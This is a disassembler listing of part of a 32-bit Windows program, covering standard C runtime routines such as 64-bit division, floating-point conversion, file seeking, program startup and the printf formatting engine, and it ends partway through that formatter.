pop ebx
retn 10h
sub_414580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414600 proc near ; CODE XREF: sub_40FD69+24�p
; sub_413820+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_414622
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_414663
; ---------------------------------------------------------------------------
loc_414622: ; CODE XREF: sub_414600+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_414630: ; CODE XREF: sub_414600+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_414630
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_41465E
cmp edx, [esp+8+arg_4]
ja short loc_41465E
jb short loc_41465F
cmp eax, [esp+8+arg_0]
jbe short loc_41465F
loc_41465E: ; CODE XREF: sub_414600+4E�j
; sub_414600+54�j
dec esi
loc_41465F: ; CODE XREF: sub_414600+56�j
; sub_414600+5C�j
xor edx, edx
mov eax, esi
loc_414663: ; CODE XREF: sub_414600+20�j
pop esi
pop ebx
retn 10h
sub_414600 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414670 proc near ; CODE XREF: sub_41046C+22C�p
; sub_41046C+285�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp dword_47A3E0, 0
jz sub_419AF8
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_4146A4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_4146A4: ; CODE XREF: sub_414670+23�j
lea esp, [esp+8]
jnz sub_419AF8
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_4277A0
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_4277D0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jnz short loc_414732
cmp eax, 3FFh
jl short loc_41476A
psllq xmm1, xmm2
cmp eax, 432h
jg short loc_414703
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_414703: ; CODE XREF: sub_414670+86�j
; sub_414670+E1�j
ucomisd xmm7, xmm7
jnp short loc_41472D
mov edx, 3EDh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_4197D8
add esp, 10h
loc_41472D: ; CODE XREF: sub_414670+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_414732: ; CODE XREF: sub_414670+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 1
cmp eax, 0BFFh
jl short loc_41476D
cmp eax, 0C32h
jg short loc_414703
andpd xmm0, oword ptr ds:oword_427790
subsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_41476A: ; CODE XREF: sub_414670+7B�j
fldz
retn
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414670+DA�j
cmppd xmm3, oword ptr ds:oword_4277C0, 1
orpd xmm3, oword ptr ds:oword_4277C0
andpd xmm3, oword ptr ds:oword_4277B0
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_414670 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414794 proc near ; CODE XREF: sub_41046C+233�p
; sub_41046C+28C�p
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_4147F3
loc_4147B7: ; CODE XREF: sub_414794+69�j
fsubp st(1), st
test edx, edx
jns short loc_4147DB
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_414807
; ---------------------------------------------------------------------------
loc_4147DB: ; CODE XREF: sub_414794+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_414807
; ---------------------------------------------------------------------------
loc_4147F3: ; CODE XREF: sub_414794+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_4147B7
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_414807: ; CODE XREF: sub_414794+45�j
; sub_414794+5D�j
leave
retn
sub_414794 endp
; =============== S U B R O U T I N E =======================================
sub_414809 proc near ; CODE XREF: sub_414898+22�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
push edi
jz short loc_414887
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_414828
cmp edi, 1
jz short loc_414828
cmp edi, 2
jnz short loc_414887
loc_414828: ; CODE XREF: sub_414809+13�j
; sub_414809+18�j
and eax, 0FFFFFFEFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_414840
push esi
call sub_419CE8
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_414840: ; CODE XREF: sub_414809+28�j
push esi
call sub_41644D
mov eax, [esi+0Ch]
test al, al
pop ecx
jns short loc_414856
and eax, 0FFFFFFFCh
mov [esi+0Ch], eax
jmp short loc_41486A
; ---------------------------------------------------------------------------
loc_414856: ; CODE XREF: sub_414809+43�j
test al, 1
jz short loc_41486A
test al, 8
jz short loc_41486A
test ah, 4
jnz short loc_41486A
mov dword ptr [esi+18h], 200h
loc_41486A: ; CODE XREF: sub_414809+4B�j
; sub_414809+4F�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_419C3D
xor ecx, ecx
add esp, 0Ch
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_414895
; ---------------------------------------------------------------------------
loc_414887: ; CODE XREF: sub_414809+B�j
; sub_414809+1D�j
call sub_417C70
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_414895: ; CODE XREF: sub_414809+7C�j
pop edi
pop esi
retn
sub_414809 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414898 proc near ; CODE XREF: sub_410A22+2C6�p
; sub_410A22+402�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset stru_4277E0
call __SEH_prolog
push [ebp+arg_0]
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414809
add esp, 0Ch
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4148D7
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_414898 endp
; =============== S U B R O U T I N E =======================================
sub_4148D7 proc near ; CODE XREF: sub_414898+31�p
; DATA XREF: .rdata:stru_4277E0�o
push dword ptr [ebp+8]
call sub_4166C5
pop ecx
retn
sub_4148D7 endp
; =============== S U B R O U T I N E =======================================
sub_4148E1 proc near ; CODE XREF: .text:00414A29�p
; .text:00414A4F�p ...
arg_0 = dword ptr 4
cmp dword_479EA8, 1
jnz short loc_4148EF
call sub_419FC1
loc_4148EF: ; CODE XREF: sub_4148E1+7�j
push [esp+arg_0]
call sub_419E4A
push 0FFh
call off_42C740
pop ecx
pop ecx
retn
sub_4148E1 endp
; =============== S U B R O U T I N E =======================================
sub_414906 proc near ; CODE XREF: .text:004149FF�p
; .text:00414A10�p
arg_0 = dword ptr 4
cmp dword_479EA8, 1
jnz short loc_414914
call sub_419FC1
loc_414914: ; CODE XREF: sub_414906+7�j
push [esp+arg_0]
call sub_419E4A
push 0FFh
call sub_4143B9
pop ecx
pop ecx
retn
sub_414906 endp
; ---------------------------------------------------------------------------
push 60h
push offset stru_4277F0
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_412DD0
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call ds:dword_41F0F8 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_479E5C, ecx
mov eax, [esi+4]
mov dword_479E68, eax
mov edx, [esi+8]
mov dword_479E6C, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_479E60, esi
cmp ecx, 2
jz short loc_41498A
or esi, 8000h
mov dword_479E60, esi
loc_41498A: ; CODE XREF: .text:0041497C�j
shl eax, 8
add eax, edx
mov dword_479E64, eax
xor esi, esi
push esi
mov edi, ds:dword_41F078
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_4149C5
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_4149C5
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_4149DD
cmp eax, 20Bh
jz short loc_4149CA
loc_4149C5: ; CODE XREF: .text:004149A4�j
; .text:004149B1�j ...
mov [ebp-1Ch], esi
jmp short loc_4149F1
; ---------------------------------------------------------------------------
loc_4149CA: ; CODE XREF: .text:004149C3�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_4149C5
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_4149EB
; ---------------------------------------------------------------------------
loc_4149DD: ; CODE XREF: .text:004149BC�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_4149C5
xor eax, eax
cmp [ecx+0E8h], esi
loc_4149EB: ; CODE XREF: .text:004149DB�j
setnz al
mov [ebp-1Ch], eax
loc_4149F1: ; CODE XREF: .text:004149C8�j
push 1
call sub_41677E
pop ecx
test eax, eax
jnz short loc_414A05
push 1Ch
call sub_414906
pop ecx
loc_414A05: ; CODE XREF: .text:004149FB�j
call sub_4154C7
test eax, eax
jnz short loc_414A16
push 10h
call sub_414906
pop ecx
loc_414A16: ; CODE XREF: .text:00414A0C�j
call sub_419750
mov [ebp-4], esi
call sub_41A5BE
test eax, eax
jge short loc_414A2F
push 1Bh
call sub_4148E1
pop ecx
loc_414A2F: ; CODE XREF: .text:00414A25�j
call ds:dword_41F14C ; GetCommandLineA
mov dword_47B664, eax
call sub_41A49C
mov dword_479EA0, eax
call sub_41A3FA
test eax, eax
jge short loc_414A55
push 8
call sub_4148E1
pop ecx
loc_414A55: ; CODE XREF: .text:00414A4B�j
call sub_41A1C7
test eax, eax
jge short loc_414A66
push 9
call sub_4148E1
pop ecx
loc_414A66: ; CODE XREF: .text:00414A5C�j
call sub_4143FB
mov [ebp-20h], eax
cmp eax, esi
jz short loc_414A79
push eax
call sub_4148E1
pop ecx
loc_414A79: ; CODE XREF: .text:00414A70�j
mov [ebp-38h], esi
lea eax, [ebp-64h]
push eax
call ds:dword_41F148 ; GetStartupInfoA
call sub_41A15E
mov [ebp-68h], eax
test byte ptr [ebp-38h], 1
jz short loc_414A9A
movzx eax, word ptr [ebp-34h]
jmp short loc_414A9D
; ---------------------------------------------------------------------------
loc_414A9A: ; CODE XREF: .text:00414A92�j
push 0Ah
pop eax
loc_414A9D: ; CODE XREF: .text:00414A98�j
push eax
push dword ptr [ebp-68h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_40D1EF
mov edi, eax
mov [ebp-6Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_414ABB
push edi
call sub_414533
loc_414ABB: ; CODE XREF: .text:00414AB3�j
call sub_414555
jmp short loc_414AED
; ---------------------------------------------------------------------------
loc_414AC2: ; DATA XREF: .rdata:stru_4277F0�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-70h], ecx
push eax
push ecx
call sub_419FFA
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_414AD6: ; DATA XREF: .rdata:stru_4277F0�o
mov esp, [ebp-18h]
mov edi, [ebp-70h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_414AE8
push edi
call sub_414544
loc_414AE8: ; CODE XREF: .text:00414AE0�j
call sub_414564
loc_414AED: ; CODE XREF: .text:00414AC0�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414AFC proc near ; CODE XREF: sub_412BB5+4B�p
; sub_412E0D+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_414C08
test al, 40h
jnz loc_414C08
test al, 1
jz short loc_414B35
and dword ptr [esi+4], 0
test al, 10h
jz loc_414C08
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_414B35: ; CODE XREF: sub_414AFC+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_414B71
cmp esi, offset dword_42C920
jz short loc_414B5F
cmp esi, offset dword_42C940
jnz short loc_414B6A
loc_414B5F: ; CODE XREF: sub_414AFC+59�j
push ebx
call sub_41AA50
test eax, eax
pop ecx
jnz short loc_414B71
loc_414B6A: ; CODE XREF: sub_414AFC+61�j
push esi
call sub_41AA0C
pop ecx
loc_414B71: ; CODE XREF: sub_414AFC+51�j
; sub_414AFC+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_414BDE
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_414B9E
push edi
push eax
push ebx
call sub_41A961
mov [ebp+arg_4], eax
jmp short loc_414BD1
; ---------------------------------------------------------------------------
loc_414B9E: ; CODE XREF: sub_414AFC+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_414BBC
mov ecx, ebx
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_414BC1
; ---------------------------------------------------------------------------
loc_414BBC: ; CODE XREF: sub_414AFC+A5�j
mov eax, offset dword_42D068
loc_414BC1: ; CODE XREF: sub_414AFC+BE�j
test byte ptr [eax+4], 20h
jz short loc_414BD4
push 2
push 0
push ebx
call sub_419C3D
loc_414BD1: ; CODE XREF: sub_414AFC+A0�j
add esp, 0Ch
loc_414BD4: ; CODE XREF: sub_414AFC+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_414BF2
; ---------------------------------------------------------------------------
loc_414BDE: ; CODE XREF: sub_414AFC+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41A961
add esp, 0Ch
mov [ebp+arg_4], eax
loc_414BF2: ; CODE XREF: sub_414AFC+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_414BFE
or dword ptr [esi+0Ch], 20h
jmp short loc_414C0E
; ---------------------------------------------------------------------------
loc_414BFE: ; CODE XREF: sub_414AFC+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_414C11
; ---------------------------------------------------------------------------
loc_414C08: ; CODE XREF: sub_414AFC+10�j
; sub_414AFC+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_414C0E: ; CODE XREF: sub_414AFC+100�j
or eax, 0FFFFFFFFh
loc_414C11: ; CODE XREF: sub_414AFC+10A�j
pop esi
pop ebx
pop ebp
retn
sub_414AFC endp
; =============== S U B R O U T I N E =======================================
sub_414C15 proc near ; CODE XREF: sub_414C48+11�p
; sub_414C6C+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_414C21
cmp dword ptr [ecx+8], 0
jz short loc_414C45
loc_414C21: ; CODE XREF: sub_414C15+4�j
dec dword ptr [ecx+4]
js short loc_414C31
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_414C3D
; ---------------------------------------------------------------------------
loc_414C31: ; CODE XREF: sub_414C15+F�j
movsx eax, al
push ecx
push eax
call sub_414AFC
pop ecx
pop ecx
loc_414C3D: ; CODE XREF: sub_414C15+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_414C45
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_414C45: ; CODE XREF: sub_414C15+A�j
; sub_414C15+2B�j
inc dword ptr [esi]
retn
sub_414C15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C48 proc near ; CODE XREF: sub_414CA3+6A2�p
; sub_414CA3+6CD�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_414C63
; ---------------------------------------------------------------------------
loc_414C50: ; CODE XREF: sub_414C48+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_414C15
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_414C69
loc_414C63: ; CODE XREF: sub_414C48+6�j
cmp [ebp+arg_4], 0
jg short loc_414C50
loc_414C69: ; CODE XREF: sub_414C48+19�j
pop esi
pop ebp
retn
sub_414C48 endp
; =============== S U B R O U T I N E =======================================
sub_414C6C proc near ; CODE XREF: sub_414CA3+6B6�p
; sub_414CA3+70E�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_414C99
cmp dword ptr [edi+8], 0
jnz short loc_414C99
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_414CA0
; ---------------------------------------------------------------------------
loc_414C86: ; CODE XREF: sub_414C6C+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_414C15
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_414CA0
loc_414C99: ; CODE XREF: sub_414C6C+A�j
; sub_414C6C+10�j
cmp [esp+8+arg_0], 0
jg short loc_414C86
loc_414CA0: ; CODE XREF: sub_414C6C+18�j
; sub_414C6C+2B�j
pop esi
pop ebx
retn
sub_414C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414CA3 proc near ; CODE XREF: sub_412BB5+2A�p
; sub_412E0D+29�p ...
var_254 = byte ptr -254h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_2C], eax
mov eax, [ebp+arg_4]
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_415407
push esi
push edi
mov edi, eax
jmp short loc_414CDB
; ---------------------------------------------------------------------------
loc_414CD8: ; CODE XREF: sub_414CA3+75C�j
mov ecx, [ebp+var_38]
loc_414CDB: ; CODE XREF: sub_414CA3+33�j
inc edi
cmp [ebp+var_18], 0
mov [ebp+arg_4], edi
jl loc_415405
cmp bl, 20h
jl short loc_414D02
cmp bl, 78h
jg short loc_414D02
movsx eax, bl
movsx eax, byte ptr ds:stru_4277E0._unk[eax]
and eax, 0Fh
jmp short loc_414D04
; ---------------------------------------------------------------------------
loc_414D02: ; CODE XREF: sub_414CA3+49�j
; sub_414CA3+4E�j
xor eax, eax
loc_414D04: ; CODE XREF: sub_414CA3+5D�j
movsx eax, ds:byte_427800[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+var_38], eax
ja loc_4153F8 ; default
jmp ds:off_415418[eax*4] ; switch jump
loc_414D24: ; DATA XREF: .text:off_415418�o
xor eax, eax ; jumptable 00414D1D case 1
or [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_3C], eax
mov [ebp+var_34], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov [ebp+var_28], eax
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D41: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
movsx eax, bl ; jumptable 00414D1D case 2
sub eax, 20h
jz short loc_414D84
sub eax, 3
jz short loc_414D7B
sub eax, 8
jz short loc_414D72
dec eax
dec eax
jz short loc_414D69
sub eax, 3
jnz loc_4153F8 ; default
or [ebp+var_8], 8
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D69: ; CODE XREF: sub_414CA3+B2�j
or [ebp+var_8], 4
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D72: ; CODE XREF: sub_414CA3+AE�j
or [ebp+var_8], 1
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D7B: ; CODE XREF: sub_414CA3+A9�j
or byte ptr [ebp+var_8], 80h
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D84: ; CODE XREF: sub_414CA3+A4�j
or [ebp+var_8], 2
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414D8D: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
cmp bl, 2Ah ; jumptable 00414D1D case 3
jnz short loc_414DB3
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_24], eax
jge loc_4153F8 ; default
or [ebp+var_8], 4
neg [ebp+var_24]
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DB3: ; CODE XREF: sub_414CA3+ED�j
mov eax, [ebp+var_24]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_24], eax
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DC8: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
and [ebp+var_C], 0 ; jumptable 00414D1D case 4
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DD1: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
cmp bl, 2Ah ; jumptable 00414D1D case 5
jnz short loc_414DF4
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_C], eax
jge loc_4153F8 ; default
or [ebp+var_C], 0FFFFFFFFh
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414DF4: ; CODE XREF: sub_414CA3+131�j
mov eax, [ebp+var_C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_C], eax
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E09: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
cmp bl, 49h ; jumptable 00414D1D case 6
jz short loc_414E3C
cmp bl, 68h
jz short loc_414E33
cmp bl, 6Ch
jz short loc_414E2A
cmp bl, 77h
jnz loc_4153F8 ; default
or byte ptr [ebp+var_8+1], 8
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E2A: ; CODE XREF: sub_414CA3+173�j
or [ebp+var_8], 10h
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E33: ; CODE XREF: sub_414CA3+16E�j
or [ebp+var_8], 20h
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E3C: ; CODE XREF: sub_414CA3+169�j
mov al, [edi]
cmp al, 36h
jnz short loc_414E56
cmp byte ptr [edi+1], 34h
jnz short loc_414E56
inc edi
inc edi
or byte ptr [ebp+var_8+1], 80h
mov [ebp+arg_4], edi
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E56: ; CODE XREF: sub_414CA3+19D�j
; sub_414CA3+1A3�j
cmp al, 33h
jnz short loc_414E6E
cmp byte ptr [edi+1], 32h
jnz short loc_414E6E
inc edi
inc edi
and byte ptr [ebp+var_8+1], 7Fh
mov [ebp+arg_4], edi
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414E6E: ; CODE XREF: sub_414CA3+1B5�j
; sub_414CA3+1BB�j
cmp al, 64h
jz loc_4153F8 ; default
cmp al, 69h
jz loc_4153F8 ; default
cmp al, 6Fh
jz loc_4153F8 ; default
cmp al, 75h
jz loc_4153F8 ; default
cmp al, 78h
jz loc_4153F8 ; default
cmp al, 58h
jz loc_4153F8 ; default
and [ebp+var_38], 0
loc_414EA2: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
mov ecx, off_42CE30 ; jumptable 00414D1D case 0
and [ebp+var_28], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_414EC9
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_414C15
mov bl, [edi]
inc edi
mov [ebp+arg_4], edi
loc_414EC9: ; CODE XREF: sub_414CA3+211�j
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_414C15
jmp loc_4153F8 ; default
; ---------------------------------------------------------------------------
loc_414EDB: ; CODE XREF: sub_414CA3+7A�j
; DATA XREF: .text:off_415418�o
movsx eax, bl ; jumptable 00414D1D case 7
cmp eax, 67h
jg loc_41512D
cmp eax, 65h
jge loc_414F70
cmp eax, 58h
jg loc_414FD1
jz loc_4151AE
sub eax, 43h
jz loc_414F93
dec eax
dec eax
jz short loc_414F66
dec eax
dec eax
jz short loc_414F66
sub eax, 0Ch
jnz loc_4152F6
test word ptr [ebp+var_8], 830h
jnz short loc_414F25
or byte ptr [ebp+var_8+1], 8
loc_414F25: ; CODE XREF: sub_414CA3+27C�j
; sub_414CA3+4A9�j
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnz short loc_414F32
mov ecx, 7FFFFFFFh
loc_414F32: ; CODE XREF: sub_414CA3+288�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
mov [ebp+var_10], eax
jz loc_415183
test eax, eax
jnz short loc_414F57
mov eax, off_42C74C
mov [ebp+var_10], eax
loc_414F57: ; CODE XREF: sub_414CA3+2AA�j
mov eax, [ebp+var_10]
mov [ebp+var_28], 1
jmp loc_415175
; ---------------------------------------------------------------------------
loc_414F66: ; CODE XREF: sub_414CA3+267�j
; sub_414CA3+26B�j
mov [ebp+var_3C], 1
add bl, 20h
loc_414F70: ; CODE XREF: sub_414CA3+247�j
or [ebp+var_8], 40h
cmp [ebp+var_C], 0
lea esi, [ebp+var_254]
mov [ebp+var_10], esi
jge loc_415077
mov [ebp+var_C], 6
jmp loc_4150BE
; ---------------------------------------------------------------------------
loc_414F93: ; CODE XREF: sub_414CA3+25F�j
test word ptr [ebp+var_8], 830h
jnz short loc_414F9F
or byte ptr [ebp+var_8+1], 8
loc_414F9F: ; CODE XREF: sub_414CA3+2F6�j
; sub_414CA3+336�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
jz short loc_415010
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+var_254]
push eax
call sub_41AADA
test eax, eax
pop ecx
pop ecx
mov [ebp+var_14], eax
jge short loc_415020
mov [ebp+var_34], 1
jmp short loc_415020
; ---------------------------------------------------------------------------
loc_414FD1: ; CODE XREF: sub_414CA3+250�j
sub eax, 5Ah
jz short loc_41502E
sub eax, 9
jz short loc_414F9F
dec eax
jnz loc_4152F6
loc_414FE2: ; CODE XREF: sub_414CA3+48D�j
or [ebp+var_8], 40h
loc_414FE6: ; CODE XREF: sub_414CA3+4B1�j
mov [ebp+var_14], 0Ah
loc_414FED: ; CODE XREF: sub_414CA3+519�j
; sub_414CA3+532�j ...
mov ebx, [ebp+var_8]
mov esi, 8000h
test ebx, esi
jz loc_41521E
